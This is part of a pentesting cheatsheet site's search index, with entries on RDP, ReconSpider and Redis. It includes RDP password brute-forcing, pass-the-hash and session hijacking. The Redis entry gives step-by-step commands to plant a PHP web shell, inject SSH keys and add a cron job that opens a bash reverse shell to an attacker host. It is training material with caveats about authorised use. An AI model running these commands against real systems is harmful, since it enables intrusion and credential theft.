style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Hydra\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ehydra -l \u0026lt;user\u0026gt; -P wordlist.txt rdp://\u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ehydra -L users.txt -P wordlist.txt rdp://\u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ehydra -l \u0026lt;user\u0026gt; -P wordlist.txt rdp://\u0026lt;ip\u0026gt; -t \u003cspan style=\"color:#ae81ff\"\u003e4\u003c/span\u003e \u003cspan style=\"color:#75715e\"\u003e# Limit threads (RDP is picky)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Crowbar\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecrowbar -b rdp -s \u0026lt;ip\u0026gt;/32 -u \u0026lt;user\u0026gt; -C wordlist.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecrowbar -b rdp -s 192.168.1.0/24 -U users.txt -C wordlist.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Metasploit\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003euse auxiliary/scanner/rdp/rdp_scanner\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eset RHOSTS \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003erun\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"connecting-via-linux\"\u003eConnecting via Linux\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# xfreerdp (recommended)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003exfreerdp /u:\u0026lt;user\u0026gt; /p:\u0026lt;pass\u0026gt; /v:\u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003exfreerdp /u:\u0026lt;user\u0026gt; /p:\u0026lt;pass\u0026gt; /v:\u0026lt;ip\u0026gt; /d:\u0026lt;domain\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003exfreerdp /u:\u0026lt;user\u0026gt; /p:\u0026lt;pass\u0026gt; /v:\u0026lt;ip\u0026gt; /drive:share,/tmp \u003cspan style=\"color:#75715e\"\u003e# Mount local dir\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003exfreerdp /u:\u0026lt;user\u0026gt; /p:\u0026lt;pass\u0026gt; /v:\u0026lt;ip\u0026gt; /cert-ignore \u003cspan style=\"color:#75715e\"\u003e# Ignore cert errors\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003exfreerdp /u:\u0026lt;user\u0026gt; /h:\u0026lt;nthash\u0026gt; /v:\u0026lt;ip\u0026gt; \u003cspan style=\"color:#75715e\"\u003e# Pass-the-Hash\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# rdesktop\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003erdesktop \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003erdesktop -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; -d \u0026lt;domain\u0026gt; \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Remmina (GUI)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eremmina -c rdp://\u0026lt;user\u0026gt;@\u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"session-hijacking-post-exploitation\"\u003eSession Hijacking (Post-Exploitation)\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-cmd\" data-lang=\"cmd\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e# List sessions (on Windows target)\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003equery session\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003equery user\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e# Hijack disconnected session (as SYSTEM)\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003etscon \u0026lt;session_id\u0026gt; /dest:\u0026lt;current_session\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"key-vulnerabilities\"\u003eKey Vulnerabilities\u003c/h2\u003e\n\u003ctable\u003e\n\t\u003cthead\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003cth\u003eCVE\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eName\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eAffected Systems\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eDescription\u003c/th\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/thead\u003e\n\t\u003ctbody\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003eCVE-2019-0708\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eBlueKeep\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eWin7, WinXP, Server 2008\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003ePre-auth RCE via RDP\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003eCVE-2019-1181\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eDejaBlue\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eWin8, Win10, Server 2012+\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003ePre-auth RCE via RDP\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003eCVE-2019-1182\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eDejaBlue\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eWin8, Win10, Server 2012+\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003ePre-auth RCE via RDP\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003eCVE-2012-0002\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eMS12-020\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eMultiple\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eDoS / potential code execution\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/tbody\u003e\n\u003c/table\u003e\n\u003chr\u003e\n\u003ch2 id=\"bluekeep-check-metasploit\"\u003eBlueKeep Check (Metasploit)\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003euse auxiliary/scanner/rdp/cve_2019_0708_bluekeep\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eset RHOSTS \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003erun\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"useful-options\"\u003eUseful Options\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Custom RDP port\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003exfreerdp /u:\u0026lt;user\u0026gt; /p:\u0026lt;pass\u0026gt; /v:\u0026lt;ip\u0026gt;:\u0026lt;port\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Enable clipboard sharing\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003exfreerdp /u:\u0026lt;user\u0026gt; /p:\u0026lt;pass\u0026gt; /v:\u0026lt;ip\u0026gt; +clipboard\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Full screen\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003exfreerdp /u:\u0026lt;user\u0026gt; /p:\u0026lt;pass\u0026gt; /v:\u0026lt;ip\u0026gt; /f\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Dynamic resolution\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003exfreerdp /u:\u0026lt;user\u0026gt; /p:\u0026lt;pass\u0026gt; /v:\u0026lt;ip\u0026gt; /dynamic-resolution\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e","title":"RDP"},{"content":"ReconSpider Cheatsheet Type: Custom Scrapy-based web crawler that maps a target site and harvests links, emails, subdomains, external hosts, images, files, and metadata into a single JSON report\nInstallation # Download the spider (HTB Academy distribution) wget -O ReconSpider.zip \\ https://academy.hackthebox.com/storage/modules/144/ReconSpider.v1.06.zip unzip ReconSpider.zip # Requires Scrapy (and Python 3) pip3 install scrapy ReconSpider is a single Python script (ReconSpider.py) built on top of [[scrapy]]. There is no system package — it runs directly with python3.\nBasic Usage python3 ReconSpider.py \u0026lt;target_url\u0026gt; python3 ReconSpider.py https://example.com Results are written to results.json in the current directory.\nWhat It Collects Field Description emails Email addresses found in page content links Internal links discovered while crawling external_files Links to documents (PDF, DOCX, XLSX, etc.) js_files JavaScript files referenced by the site form_fields Input field names from HTML forms images Image URLs videos Video URLs audio Audio file URLs comments HTML comments left in the source Common Commands # Crawl a target (writes results.json) python3 ReconSpider.py https://example.com # Pretty-print the full report cat results.json | jq # Extract just the emails cat results.json | jq \u0026#39;.emails\u0026#39; # Extract all discovered internal links cat results.json | jq \u0026#39;.links[]\u0026#39; # Pull out referenced JavaScript files (good for further analysis) cat results.json | jq \u0026#39;.js_files[]\u0026#39; # List any external documents (PDFs, office files, etc.) cat results.json | jq \u0026#39;.external_files[]\u0026#39; # Show HTML comments (may leak dev notes / credentials) cat results.json | jq \u0026#39;.comments[]\u0026#39; # Grab form field names (useful for fuzzing later) cat results.json | jq \u0026#39;.form_fields[]\u0026#39; Parsing Output with jq # Count results per category cat results.json | jq \u0026#39;to_entries | map({key, count: (.value | length)})\u0026#39; # Unique subdomains hidden inside the link list cat results.json | jq -r \u0026#39;.links[]\u0026#39; \\ | sed -E \u0026#39;s#https?://([^/]+)/.*#\\1#\u0026#39; | sort -u # Build a target list of live JS files to feed into other tools cat results.json | jq -r \u0026#39;.js_files[]\u0026#39; \u0026gt; js_targets.txt Typical Workflow # 1. Crawl the target python3 ReconSpider.py https://inlanefreight.com # 2. Review the harvested data cat results.json | jq # 3. Pivot on findings: # - emails -\u0026gt; phishing / OSINT / password spraying lists # - js_files -\u0026gt; grep for API keys, endpoints, secrets # - comments -\u0026gt; developer notes, hidden paths # - form_fields -\u0026gt; input names for ffuf / parameter fuzzing # - links -\u0026gt; extract subdomains, feed to httprobe / nmap cat results.json | jq -r \u0026#39;.links[]\u0026#39; | sed -E \u0026#39;s#https?://([^/]+).*#\\1#\u0026#39; \\ | sort -u | httprobe Notes Active — ReconSpider sends live requests and crawls the target; stay within authorised scope. Output is always results.json in the working directory — rename it between runs to avoid overwriting. Built on [[scrapy]]; for finer control (depth limits, delays, custom selectors) drive Scrapy directly. The comments, js_files, and form_fields outputs are the highest-value findings for follow-up testing. Commonly featured in the HTB Academy Information Gathering – Web Edition module for site crawling. ","permalink":"https://d3vilsec.com/cheatsheets/pentesting/information-gathering-web-edition/web-crawling/reconspider/","summary":"\u003ch1 id=\"reconspider-cheatsheet\"\u003eReconSpider Cheatsheet\u003c/h1\u003e\n\u003cp\u003e\u003cstrong\u003eType:\u003c/strong\u003e Custom Scrapy-based web crawler that maps a target site and harvests links, emails, subdomains, external hosts, images, files, and metadata into a single JSON report\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 id=\"installation\"\u003eInstallation\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Download the spider (HTB Academy distribution)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ewget -O ReconSpider.zip \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e https://academy.hackthebox.com/storage/modules/144/ReconSpider.v1.06.zip\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eunzip ReconSpider.zip\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Requires Scrapy (and Python 3)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003epip3 install scrapy\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cblockquote\u003e\n\u003cp\u003eReconSpider is a single Python script (\u003ccode\u003eReconSpider.py\u003c/code\u003e) built on top of [[scrapy]]. There is no system package — it runs directly with \u003ccode\u003epython3\u003c/code\u003e.\u003c/p\u003e","title":"ReconSpider"},{"content":"Redis Enumeration Cheatsheet Default Port: 6379 (TCP) — often unauthenticated and bound to all interfaces\nInitial Scanning nmap -p 6379 -sV \u0026lt;ip\u0026gt; nmap -p 6379 --script redis-info \u0026lt;ip\u0026gt; # Server info / config nmap -p 6379 --script redis-* \u0026lt;ip\u0026gt; # All Redis scripts Connecting # Install client sudo apt install redis-tools # Connect (no auth) redis-cli -h \u0026lt;ip\u0026gt; redis-cli -h \u0026lt;ip\u0026gt; -p 6379 # Authenticated redis-cli -h \u0026lt;ip\u0026gt; -a \u0026lt;password\u0026gt; redis-cli -h \u0026lt;ip\u0026gt; -a \u0026lt;password\u0026gt; --no-auth-warning # One-off command without interactive shell redis-cli -h \u0026lt;ip\u0026gt; INFO # Raw connection (no client installed) nc \u0026lt;ip\u0026gt; 6379 # then type: INFO (end with CRLF) Basic Enumeration # Inside redis-cli (or: redis-cli -h \u0026lt;ip\u0026gt; \u0026lt;command\u0026gt;) INFO # Full server info (version, OS, role, etc.) INFO server # Just server section INFO keyspace # Databases in use and key counts CONFIG GET * # Dump all config values CONFIG GET dir # Working directory (useful for writes) CONFIG GET dbfilename # RDB filename CLIENT LIST # Connected clients COMMAND COUNT # Number of available commands ACL WHOAMI # Current user (Redis 6+) ACL LIST # Access control rules (Redis 6+) Exploring Data SELECT \u0026lt;n\u0026gt; # Switch DB index (default 0) DBSIZE # Number of keys in current DB KEYS * # List ALL keys (heavy on large DBs) SCAN 0 # Cursor-based key iteration (safer) RANDOMKEY # Return a random key # Inspect a key TYPE \u0026lt;key\u0026gt; # Data type (string, list, set, hash, zset) TTL \u0026lt;key\u0026gt; # Time to live # Read by type GET \u0026lt;key\u0026gt; # string LRANGE \u0026lt;key\u0026gt; 0 -1 # list SMEMBERS \u0026lt;key\u0026gt; # set HGETALL \u0026lt;key\u0026gt; # hash ZRANGE \u0026lt;key\u0026gt; 0 -1 # sorted set # Dump everything quickly redis-cli -h \u0026lt;ip\u0026gt; --scan | while read k; do echo \u0026#34;$k =\u0026gt; $(redis-cli -h \u0026lt;ip\u0026gt; GET \u0026#34;$k\u0026#34;)\u0026#34;; done Authentication Notes # Check if auth is required redis-cli -h \u0026lt;ip\u0026gt; PING # -\u0026gt; PONG = no auth (open!) # -\u0026gt; NOAUTH ... = password required # Brute force with nmap nmap -p 6379 --script redis-brute \u0026lt;ip\u0026gt; # Brute force with hydra hydra -P /usr/share/wordlists/rockyou.txt redis://\u0026lt;ip\u0026gt; RCE / Post-Exploitation (Authorised testing only) # 1. Web shell via RDB write (if web root is writable \u0026amp; known) redis-cli -h \u0026lt;ip\u0026gt; CONFIG SET dir /var/www/html CONFIG SET dbfilename shell.php SET test \u0026#34;\u0026lt;?php system($_GET[\u0026#39;cmd\u0026#39;]); ?\u0026gt;\u0026#34; SAVE # -\u0026gt; browse to http://\u0026lt;ip\u0026gt;/shell.php?cmd=id # 2. SSH key injection (if redis runs as a user with ~/.ssh writable) (echo -e \u0026#34;\\n\\n\u0026#34;; cat id_rsa.pub; echo -e \u0026#34;\\n\\n\u0026#34;) \u0026gt; key.txt redis-cli -h \u0026lt;ip\u0026gt; -x SET sshkey \u0026lt; key.txt redis-cli -h \u0026lt;ip\u0026gt; CONFIG SET dir /root/.ssh CONFIG SET dbfilename authorized_keys SET sshkey \u0026#34;...\u0026#34; SAVE # -\u0026gt; ssh -i id_rsa root@\u0026lt;ip\u0026gt; # 3. Cron job injection (write to /var/spool/cron) CONFIG SET dir /var/spool/cron/crontabs CONFIG SET dbfilename root SET shell \u0026#34;\\n\\n* * * * * bash -i \u0026gt;\u0026amp; /dev/tcp/\u0026lt;lhost\u0026gt;/\u0026lt;lport\u0026gt; 0\u0026gt;\u0026amp;1\\n\\n\u0026#34; SAVE Module loading (Redis 4.x/5.x): MODULE LOAD \u0026lt;path\u0026gt; can load a malicious .so for RCE (e.g. RedisModules-ExecuteCommand / exp.so). Newer versions restrict this.\nUseful Commands Reference Command Description PING Test connectivity / auth AUTH \u0026lt;pass\u0026gt; Authenticate INFO Server stats and config CONFIG GET \u0026lt;param\u0026gt; Read a config value CONFIG SET \u0026lt;param\u0026gt; \u0026lt;val\u0026gt; Change a config value at runtime SELECT \u0026lt;n\u0026gt; Switch logical database KEYS * / SCAN 0 Enumerate keys GET / HGETALL / LRANGE / SMEMBERS Read values by type SAVE / BGSAVE Persist data to disk (RDB) MONITOR Live stream of all commands (great for sniffing) FLUSHALL Wipe all data (destructive — avoid) Notes Redis has no authentication by default and historically binds to all interfaces — exposed instances are common. CONFIG GET dir + CONFIG SET dbfilename is the key to most file-write attacks; check whether CONFIG is disabled/renamed first. MONITOR reveals live traffic including credentials passed via AUTH — useful but noisy. Redis 6+ adds ACLs and protected mode; protected-mode yes blocks external no-auth access. Only attempt write/RCE techniques against systems you\u0026rsquo;re authorised to test — they modify the target. ","permalink":"https://d3vilsec.com/cheatsheets/pentesting/footprinting/redis/","summary":"\u003ch1 id=\"redis-enumeration-cheatsheet\"\u003eRedis Enumeration Cheatsheet\u003c/h1\u003e\n\u003cp\u003e\u003cstrong\u003eDefault Port:\u003c/strong\u003e 6379 (TCP) — often unauthenticated and bound to all interfaces\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 id=\"initial-scanning\"\u003eInitial Scanning\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e6379\u003c/span\u003e -sV \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e6379\u003c/span\u003e --script redis-info \u0026lt;ip\u0026gt; \u003cspan style=\"color:#75715e\"\u003e# Server info / config\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e6379\u003c/span\u003e --script redis-* \u0026lt;ip\u0026gt; \u003cspan style=\"color:#75715e\"\u003e# All Redis scripts\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"connecting\"\u003eConnecting\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Install client\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esudo apt install redis-tools\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Connect (no auth)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eredis-cli -h \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eredis-cli -h \u0026lt;ip\u0026gt; -p \u003cspan style=\"color:#ae81ff\"\u003e6379\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Authenticated\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eredis-cli -h \u0026lt;ip\u0026gt; -a \u0026lt;password\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eredis-cli -h \u0026lt;ip\u0026gt; -a \u0026lt;password\u0026gt; --no-auth-warning\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# One-off command without interactive shell\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eredis-cli -h \u0026lt;ip\u0026gt; INFO\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Raw connection (no client installed)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enc \u0026lt;ip\u0026gt; \u003cspan style=\"color:#ae81ff\"\u003e6379\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# then type: INFO (end with CRLF)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"basic-enumeration\"\u003eBasic Enumeration\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Inside redis-cli (or: redis-cli -h \u0026lt;ip\u0026gt; \u0026lt;command\u0026gt;)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eINFO \u003cspan style=\"color:#75715e\"\u003e# Full server info (version, OS, role, etc.)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eINFO server \u003cspan style=\"color:#75715e\"\u003e# Just server section\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eINFO keyspace \u003cspan style=\"color:#75715e\"\u003e# Databases in use and key counts\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eCONFIG GET * \u003cspan style=\"color:#75715e\"\u003e# Dump all config values\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eCONFIG GET dir \u003cspan style=\"color:#75715e\"\u003e# Working directory (useful for writes)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eCONFIG GET dbfilename \u003cspan style=\"color:#75715e\"\u003e# RDB filename\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eCLIENT LIST \u003cspan style=\"color:#75715e\"\u003e# Connected clients\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eCOMMAND COUNT \u003cspan style=\"color:#75715e\"\u003e# Number of available commands\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eACL WHOAMI \u003cspan 